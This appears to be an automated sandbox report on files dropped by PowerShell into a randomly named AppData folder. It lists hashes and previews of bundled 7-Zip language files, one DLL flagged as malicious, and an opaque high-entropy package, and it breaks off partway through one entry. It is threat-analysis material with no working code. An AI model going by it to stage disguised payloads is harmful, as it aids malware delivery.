                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mng.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20722
                                                                                                                                                          Entropy (8bit):3.631283338815982
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ip3jpGUSlwi6aHQIXqB6B22bKP995BOqB8A5Y8KsC3u6cIVFJFGtMksJYkXoFs85:MWJbm50qN5Esd6t/XWjgqVpzs4XZd8sL
                                                                                                                                                          MD5:BA28C5C312D1A7827B40ED84F1F6F85B
                                                                                                                                                          SHA1:72788C4B14C47A3988245E81FC6E7BBB8F88442F
                                                                                                                                                          SHA-256:92898472C1DB5248B0556FB5BAFDA8090684249B561DE5EF2A84C10F2F4383CA
                                                                                                                                                          SHA-512:35871824ADEDE6169118087D28FE3C78EA09CB259C7C168E83A22CA74C024D9F0D61250AD1FC9F75B71A8EE5235A12FFD52C146B8232B7BEA84EC024B19DA7D5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 7-Zip 9.20..; Saqirilatu Mongolqileb..; QQ:136087084 Email:saqirilatu@126.com..; Mongol soft QQ bulug .: 39338772 .:38803882..; Toli Mongolian IME ..; http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d..;last updated: 2014-1-1..;..;..;..;..0..7-Zip..Mongolian (Unicode)........ ......401............................ (&Y)...... (&N)........ (&C)........................ (&C)..440........ .... (&A)........ .... (&L).................. ............ ..... (&B)........ ..... (&F)........... (&P)......... ........... ...... ........ .. ...500....... (&F)............. (&E)....... (&V)...........

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mng2.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22220
                                                                                                                                                          Entropy (8bit):3.789538915454832
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ip3pxHmpcSmhZcbnD1e+Ft9780rdLdNQwL4rG/d+RWsB/O54Q4gLwqZ816d20xUS:ip3jJfHp4BLLCJOIYB
                                                                                                                                                          MD5:A0D06DC2B7F53ACD8CDEBF7864080CD1
                                                                                                                                                          SHA1:A4B9C4D1C4355BD90356E60289FB4EFCE0046B6A
                                                                                                                                                          SHA-256:47BFE43F3F5A88A0F366FB317A542CDC1E216F8C368DDC67252480EDE7D130F4
                                                                                                                                                          SHA-512:811FDBFC11F8DB60B2D059D433495FD50220E5A718ED9FE7F9C422D9695353825129B05E0F287419D4784C3564EA7CF7BE9117C4408170F4AFA3353FBC875442
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 7-Zip 9.20..; Saqirilatu Mongolqileb..; QQ:136087084 Email:saqirilatu@126.com..; Mongol soft QQ bulug .: 39338772 .:38803882..; Toli Mongolian IME ..; http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d..;last updated: 2013-12-11..; Update and Spelling corrected Bayarsaikhan..;..;..;..0..7-Zip..Mongolian (MenkCode).......... ......401.................................. (&Y)...... (&N).......... (&C)........................... (&C)..440......... ..... (&A)......... .... (&L)..................... ............. .... (&B)....... ... (&F)........... (&P)......... ............. ........ ............ .. .

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mr.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10948
                                                                                                                                                          Entropy (8bit):4.055130920365555
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iSdCIrunpyKHseL4bzwltFrjVL0TEpbpFeki8rJNhBB:iSt6pypS4A7FYA1r
                                                                                                                                                          MD5:2E9FC42DBD17E30F8DB8205FA2D18543
                                                                                                                                                          SHA1:60639E6D06A38D5C507136C130A172D606B698E7
                                                                                                                                                          SHA-256:08B8F7FF35DD4315133E04FD17B6FB896D63B9C87040A2CC68A83E81EA4EFD78
                                                                                                                                                          SHA-512:7E1AA7234DC2C07654847DE01600787BA735E9CCF5D376D37696F3810418A357BEB1D611A164FDFD7A24CA33E7BED150DF08187D4ADE6C973C45BE5DF74FD95F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.42 : ...... ..... ....... (Subodh Gaikwad)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Marathi.........401...................&....&......&............&......440..&.... .. ....&.... .. ................... .... .....&.... ......&.... .....&.......................... .... .......... ...... ... ..?..500..&......&........&........&......&.......&.....540..&......&.... ......&..... ......&.......&........... .....&..............&.........&.......&.... ..... ............ ..........

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1075904
                                                                                                                                                          Entropy (8bit):6.563245468568026
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:9wsK8YWuTCipwKm3ZCdX+y0Cg57ZrVmK5UhYX5NN/u3ZeEb+LJkKuZl1Y1e:P6WuFKKVuig5jZ5xX5P2bKyKu1j
                                                                                                                                                          MD5:94321A6D490CA5442CF36B07DB16419C
                                                                                                                                                          SHA1:639E08BC92106902FACF7CEFDC9B340682572B2A
                                                                                                                                                          SHA-256:A7827463E9587A238DB927CF61AB92B95C0EF52B18467583DD859BED98543DA7
                                                                                                                                                          SHA-512:1944916CA997C01A11C77016791612382832AF6AB4822992694460AC4C9E5BA72E193416FA17C898A1D201826BDAF3176A2B303C035A37B124CCD4937D4F4B74
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...44.[.................,...........:.......@....PJ.................................W..................................R....P...........................r......`....................................................Y..4............................text............ .................. ..`.itext.......0.......$.............. ..`.data...X....@.......0..............@....bss....Te...............................idata.......P...0..................@....didata.............................@....edata..R...........................@..@.rdata..D...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@........................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ne.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13609
                                                                                                                                                          Entropy (8bit):3.9309107268099224
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iv4xgZB/n6NclUY0PA8jaeQPYX89RcgDZjGKOVdp:ivYUSNcOY0PA8+0gfOJ
                                                                                                                                                          MD5:C7ED0560A6145A417B1E92546ED6B0F1
                                                                                                                                                          SHA1:6BE9FF3E7EF34767CAA165A0E9851914BB65378A
                                                                                                                                                          SHA-256:C129F67193295736E1C1FF4AC7245CBD737A07EA6073B43FD22AC767F3D56E23
                                                                                                                                                          SHA-512:508504216C916C6EF168062C1D13336594D469DB92D8B40571C726A4B3053CA6FD0C57F9F2FC389F3216A5C663EBDC4AA520462EF39ABD5BE55C7B87B522D90F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.37 : Shiva Pokharel, Mahesh Subedi..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Nepali..........401..... ....... .................&....&......&.... ....................&.... ............440..&...... ....&...... .....................: .... ...........&...........&..........&.. ............. ............. .... .... .... ......... ?..500..&......&....... ...........&............&..........&.......&.......540..&...................... ...................... ....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\nl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9158
                                                                                                                                                          Entropy (8bit):4.922508061076594
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3oJFqYSagoQss8Yok0y0qiqfUaep0XTrsv3H2TzQEjsrKdOZhGcicbyoL0rnycW:i3AQZUaemXTOWTMosI9loAry34sf
                                                                                                                                                          MD5:54169E744254BB5A4182BCB2678F8479
                                                                                                                                                          SHA1:244FF8C38C8DA10E20282CF74A08E18AB165640C
                                                                                                                                                          SHA-256:8A74F64C91C25DA6056B054D388BF1BBD97384AD7D0086F86DF0240E077C6149
                                                                                                                                                          SHA-512:B798027C10F2AA7F06FA4FC3473F3040A23968D967AA93C08D072F86DA2747D7847F8D7B37BC796A8270721C200978C61B1A4A5C6FD8B87845FDBB1337A142A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Bert van Velsen..; 4.26 : Jeroen van der Weijde...; : Harm Hilvers..; 9.07 : Jeroen Tulp ..; 15.00 : Jeroen Tulp ..; 21.03 : Quinten Althues..; 21.05 : Jeroen Tulp..;..;..;..;..0..7-Zip..Dutch..Nederlands..401..OK..Annuleren........&Ja..&Nee..A&fsluiten..Help....&Hervatten..440..Ja op &alles..Nee op a&lles..Stoppen..Herstarten..&Achtergrond..&Voorgrond..&Pauzeren..Gepauzeerd..Weet u zeker dat u wilt annuleren?..500..&Bestand..Be&werken..Bee&ld..&Favorieten..E&xtra..&Help..540..&Openen..Open b&innen..Open b&uiten..Be&kijken..&Bewerken..&Hernoemen..&Kopi.ren naar.....&Verplaatsen naar.....Verwij&deren..Bestand &opsplitsen.....Bestanden &samenvoegen.....&Eigenschappen..O&pmerking plaatsen.....Controlegetal berekenen..Delta..Nieuwe map..Nieuw bestand..&Sluiten..Koppeling..&Alternate streams..600..&Alles selecteren..Alles deselecteren..Selectie &omkeren..&Selecteren.....&Deselecteren.....Selecteren op &type..Deselecteren op t&ype..700..&Grote pictogra

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\nolimetangere.pkg

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):798054
                                                                                                                                                          Entropy (8bit):7.883843199788873
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:y2eLUppvK0pIw10hf2SZCFILyTVAtIeH6b5+zoTcefCDlNxEawbSSWZ3O:B3e1nGepfH6bCe6pNQvq3O
                                                                                                                                                          MD5:2BA2923D166E89451FAB8B0F1F48A552
                                                                                                                                                          SHA1:A3B8226B8FC5266105347CCB623500750A1B561E
                                                                                                                                                          SHA-256:51E588E5C974CBB81B3C22ED4BA9C7188DC057A2BD77B248F4EEC4BABCF23761
                                                                                                                                                          SHA-512:71207BB1493412737EE821754F154B76E45EE73BE539F7DF7E188E18CC018A45C42312844322F5BF0D8352CB3EE432F1314D8C69E458CBEC25C9B47A5BF7BB0A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:\........o.q.j...y..ZejlG.A._.....ayEVA.U_P[....S..C...H..vvr.tD.S.P.MJ.].k.`l.I..lX.X...eQ].CSd...\w...........Y.ou.j.v...myW.].L..\R...hk.icCM.^R.FLAvC..gf.qy...cf.x.._..KVaoCq...Kv.HcD...qNHf....x.n.M.V..aSF......nFVQ\y.W..`Qf..x...OvK.QkpiYG.oJ....e..D^G....Z..r...I\x..W.a.E_.qf..y.e....I..TILo.GSl.Y...X.NA.._.M....B..tb\...Qa..`...p.....RYe.RB.RM..GiAt.r.].._m..A..h..C.._Q...A.w..b..Z.TM..F..p.D..n....^`HwGlO.VZ....wj...cL.d..Cl.g..O.k..bV.._A.^t..YWUfj..H..Pto...gk.....al..Q...uPu..n......j.`.Tq.R..E.s.a.P..E..q..YQ_lN..T.....ho.[....N..i.g...Tq.md.NWy.BHq..v....Ef.[..ssGEU.P_..ah....oM.h.d..bm...n.TD..[..K.RgP.pe..q.A.k..aH.f..gK.fM...yGvK[.DE..oS.E.._.kJd.\q.q.r.O..].I.GK.b..tA....Ft`.Rq..vD..Sx.E.Rm.....E.fmo...VV...^.I`..Jb_..RxSeEn...jeOw`k...Sy.S..ET.dA......q[ID.^....o..iCp..p]OG...Z.]h..y.IO.C^.fjAB.u.R.QpW..U.s..o...u.q..jA.C.tV.`..i.^aw.iU......cJx..r.p\O..x.]RXv.R.A.Ae....N.T.us....O.V^D`.E`r\Nu..f]R.a......C..QESTDYSt`b.qA.u.......XKR.s.X.ATH.d.Qr..U.H_K....ClWh.C.C.i

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\pa-in.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15022
                                                                                                                                                          Entropy (8bit):4.117786673775278
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iK8eAMv6KYvDPVWnkFGdRq8A9UCGd6KFnidivnjnqAPvowQoNVq4qEFmQt+MN9YL:iKpZnt/dhCivnjdjQKFNt+MNfU
                                                                                                                                                          MD5:6C48ED7DEBA6D3EFE6447BE948471810
                                                                                                                                                          SHA1:4E1D76D565211416F0ED32A2CDD473D9AC54A61F
                                                                                                                                                          SHA-256:377F793EEDF3A935DDD6260D72AC3CADA9391AAFDF1F019D0BE72BE2B83A5DD9
                                                                                                                                                          SHA-512:22B8BBB70492E19EDE9C5E74483A1A6D57D4F86F38D1321331E0137C7953C6612E03F854FB1BB0C3234BBC0F561E92501A345D881FC09DDE598E217D946018DD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : Gurmeet Singh Kochar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Punjabi, Indian..........401..... ....... .............. (&Y)...... (&N)..... ... (&C).............. ... (&C)..440........ .. ... (&A)........ .. .... (&l)........... .... .............. (&B)........... (&F)...... (&P)...... ........ ..... ........ .. ... .... ....... ..?..500...... (&F)..... (&E)...... (&V)......... (&a)..... (&T)...... (&H)..540...... (&O)...... .... (&I)...... .... (&u)....... (&V)..... ... (&E)..... .... (&m)...... ...... .. ... .....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\pl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9426
                                                                                                                                                          Entropy (8bit):5.340689293594529
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iny0xONopVdHc+Xmy9hk1s6i+6rELzpZ6+0FVEleeNRChH6ufZfjp8Rb:in3xOgvXm9s5+6QLz+jUlX2rp8Rb
                                                                                                                                                          MD5:2CDF63E6B3F3A474465D0D88E5386718
                                                                                                                                                          SHA1:AA4F3F839B35C68EA2A17E7A63053262E94F952D
                                                                                                                                                          SHA-256:223C109301A7BBF01FC57C42609083B28E3FCEDEDC1F6E6DCDFDC8EC1580C51D
                                                                                                                                                          SHA-512:DB7C086B9FD9111D468B7BB4F55455524FE161869C20C20AD7E65E5B8EEE38FD4E3B19AAA183C69C87D2C61F4561D12C90AA966A07156F193AF59BCB6DB10FF7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : cienislaw..; : pixel..; 9.07 : F1xat..; 9.33 : .ukasz Maria P. Pastuszczak..; 21.03 : Micha. L...;..;..;..;..;..;..0..7-Zip..Polish..Polski..401..OK..Anuluj........&Tak..&Nie..&Zamknij..Pomoc....&Kontynuuj..440..Ta&k na wszystkie..Ni&e na wszystkie..Zatrzymaj..Pon.w..&T.o..&Pierwszy plan..&Wstrzymaj..Wstrzymano..Czy na pewno chcesz anulowa.?..500..&Plik..&Edycja..&Widok..&Ulubione..&Narz.dzia..Pomo&c..540..&Otw.rz..Otw.rz &wewn.trz..Otw.rz na &zewn.trz..Pod&gl.d..&Edytuj..Zmie. &nazw...Kopiuj &do.....&Przenie. do.....&Usu...Podzie&l plik.....Z..&cz pliki.....W.&a.ciwo.ci..Ko&mentarz..Oblicz sum. kontroln...R..nice pomi.dzy plikami..Utw.rz &folder..U&tw.rz plik..Za&ko.cz..Dow&i.zanie..&Alternatywne strumienie..600..Z&aznacz wszystko..&Odznacz wszystko..Odwr.. &zaznaczenie..Zaznacz.....Odznacz.....Zaznacz wed.ug typu..Odznacz wed.ug typu..700..&Du.e ikony..&Ma.e ikony..&Lista..&Szczeg..y..730..Nieposortowane..Wi

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ps.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8671
                                                                                                                                                          Entropy (8bit):4.651596660116007
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:ikrJrFkaUGFoiZxn8pSbo4YCVtH7tpY+Qan1JZ0d+yccGFs8Ie30aNMfm88B9eDb:ieJZ0o98pT4YCP1pfSDHayRvpyDJe
                                                                                                                                                          MD5:8F15262B3C1CF560B6352FAE4A5FDE21
                                                                                                                                                          SHA1:C493F7834117F02AAB3DD34999ACF55977D94C67
                                                                                                                                                          SHA-256:881B19DD1F74251E475855B8BDB53CE9AF1C3D2654A9331B069A3C273F723769
                                                                                                                                                          SHA-512:18406E2C762F5E7D5D37D76C0FDC8A8A85D50FCB66B2D92D072B4CA3714FCA6EAE9CCD9DD50BBB00DA84BCCFD07EBA290930C17A1B9342626715A6D6DE8191D2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : 2007-12-26 : Pathanisation Project : pathanisation.pakhtosoft.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Pashto........401.......................&....&.......&..................&..440...... .. ..&...&... .. .........................&........&.......&............. ...... .... ..... .. ... .. ......500.......&......&.....&...&............&.......&..540..........&......& ............. .&............&......&....&............. .....&....... .....&.......&.......... ...&.......... ...&.....................&......... ............. ............ ........&.....600..... ....&..... ............. .......&........................ ... ........ ...

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\pt-br.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9515
                                                                                                                                                          Entropy (8bit):5.04214621707661
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
                                                                                                                                                          MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
                                                                                                                                                          SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
                                                                                                                                                          SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
                                                                                                                                                          SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\pt.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9444
                                                                                                                                                          Entropy (8bit):5.027498368209972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:imxbxSa4GR9N8zMzM0KgWWauXYY5wNKDyYaipnj0aQiAKECNIuZB:imBxSNGR9N8zMzM0KgERYKNYy3ipnj0G
                                                                                                                                                          MD5:E6F09B147CB07532C12E47B05CCF87B7
                                                                                                                                                          SHA1:1B6D069D431EDAC41C4221A120E8CB9B1152FC70
                                                                                                                                                          SHA-256:55807ED90AE0D9216B93EC7E1D0571CB16D7F9DB40723581AEFC4EA829D4D182
                                                                                                                                                          SHA-512:95F7DB5DD308CA3E91FC3203DFB9FA9DBABD7EEC6CF1A8590EEF0CC670C6B08447BA09AD151A972D721DBFCFA03468BB7E9D2CAC190D6C72C543CE5A16C7AA32
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Carlos Macao..; : Jo.o Alves..; : Jo.o Frade (100 NOME TR)..; 4.46 : Rui Costa..; 9.17 : S.rgio Marques ..; 15.00 : Rui Aguiar..;..;..;..;..;..0..7-Zip..Portuguese Portugal..Portugu.s..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim p/ &Todos..N.o p/ T&odos..Parar..Reiniciar..&Segundo plano..P&rimeiro plano..&Pausar..Em pausa..Quer mesmo cancelar?..500..&Ficheiro..&Editar..&Ver..F&avoritos..Ferramen&tas..&Ajuda..540..&Abrir..Abrir &dentro..Abrir &fora..&Ver..&Editar..Mudar& o nome..&Copiar para.....&Mover para.....&Eliminar..&Separar ficheiro.....Com&binar ficheiros.....P&ropriedades..Come&nt.rio..Calcular o checksum..Diff..Criar pasta..Criar ficheiro..&Sair..Link..&Alternar Fluxo..600..Seleccionar &Tudo..Desmarcar tudo..&Inverter selec..o..Seleccionar.....Desmarcar.....Seleccionar por tipo..Desmarcar por tipo..700...cones &grandes...cones &pequenos..&Lista..&Detalhes..730..Sem ordem..Vista plana..&2 pa

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ro.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7675
                                                                                                                                                          Entropy (8bit):5.101248190322628
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iVF8khF2yUYtHwfajHwKlPVS6LWbsWGGqZfG7ORVCPF27l:iD8mUYtHCxuPjWQu6KP0x
                                                                                                                                                          MD5:E3EE837F02A1F6E4B2213EB36C025284
                                                                                                                                                          SHA1:56CCAFA0F9C3D805A845311C2EBD80C93A595B17
                                                                                                                                                          SHA-256:F168BB4D026782134CC6C261006B815850E753A27FB47C4F23EE617666459A66
                                                                                                                                                          SHA-512:A923F953AF5DF72E04B5C38E523A003B85C0ED74E20AE1C3A2D4848828E03DE8E703953CFCF653C148A0EEAA9365F9187804DE0D534435CCB90DAC1C4EA68A63
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Lucian Nan : http://www.prizeeinternational.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Romanian..Rom.n...401..Bine..Anulare........&Da..&Nu..&.nchide..Ajutor....&Continu...440..Da, pe &toate..N&ici unul..Opre.te..Restarteaz....n &fundal..La &suprafa....&Pauz....n pauz...E.ti sigur c. vrei s. anulezi?..500..&Fi.ier..&Editeaz...&Vizualizeaz...F&avorite..&Unelte..&Ajutor..540..&Deschide..Deschide .&n..Deschide .n &afar...&Vizualizez...&Editeaz...&Redenume.te..&Copiaz. la.....&Mut. la......ter&ge...mparte &fi.ierul.....&Une.te fi.ierele.....&Propriet..i..Comen&tariu..Calculeaz. suma de verificare....Creaz. director..Creaz. fi.ier..&Ie.ire..600..&Selecteaz. tot..&Deselecteaz. tot..&Inverseaz. selec.ia..Selecteaz......Deselecteaz......Selecteaz. dup. tip..Deselecteaz. dup. tip..700..Iconi.e m&ari..Iconi.e m&ici..&List...&Detalii..730..Nesortat..Vedere plan...&2 panouri..Bare de &unelte..Deschide directorul r

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ru.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14667
                                                                                                                                                          Entropy (8bit):4.350951749459389
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iW2LUMKClXfitECTGV0jxOfXYCjisdvyMpf5ZOO8gCS4nY5tbV67wyxZ+XU2WtWK:i+ptEGntQYpY6MXsO7ChKeZ+HWKk
                                                                                                                                                          MD5:B5CEC4D03D2D9E162137E475C54AFBC3
                                                                                                                                                          SHA1:3E86AE0174A096B07173C623B637122E4323DD29
                                                                                                                                                          SHA-256:AC73D4810639114C3269E3BEAEC84ECAC9473CA6FBC248D804A09DF2B33E4351
                                                                                                                                                          SHA-512:CB78BD4F6D7D94780BF84F6618A2800A3B6885485C6CB7B0836AFFCB9CA6F6734834FB84F756946E59595067788CD1B1A230CEC760E39D3EA0BAF523F7CC7647
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.10 : 2018-03-29 : Igor Pavlov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Russian...........401..OK................&....&.....&...................&............440.... ... &......... ... .&.......................&.......&.. ........ ......&......... ......... ............. ...... ........ ........?..500..&......&........&.....&............&.......&.........540..&................ &............... .....&..............&....................&..........&.......... ......&........... ......&...........&..... ..........&......... .............&............&...................... .................&....... ...........&.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sa.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19628
                                                                                                                                                          Entropy (8bit):3.8659793731095453
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:isw3ma17q9ntvNTsld5VFxxwMkAGO310F0klrfofmR7HOwPyng:HwQvVnQg
                                                                                                                                                          MD5:9FE4DA297163A84FE9D0B0289B1AF077
                                                                                                                                                          SHA1:D14A6A318A50F2F13E45B2269EA2AD8FC5E3C44A
                                                                                                                                                          SHA-256:A44E8C328BF809890AA6CA883E2CB82B6C5207D9636E9A91253DA4CD893668C8
                                                                                                                                                          SHA-512:A6FEE2F3D6448F1F5BE6EC88B51FB65EBD07C7BA3DBAF2F7A801FEF54B9DA410E6B800094853180A884889B304EA9A54672781FA7D0F1067AF6C4A63C494A44B
                                                                                                                                                          Malicious:false
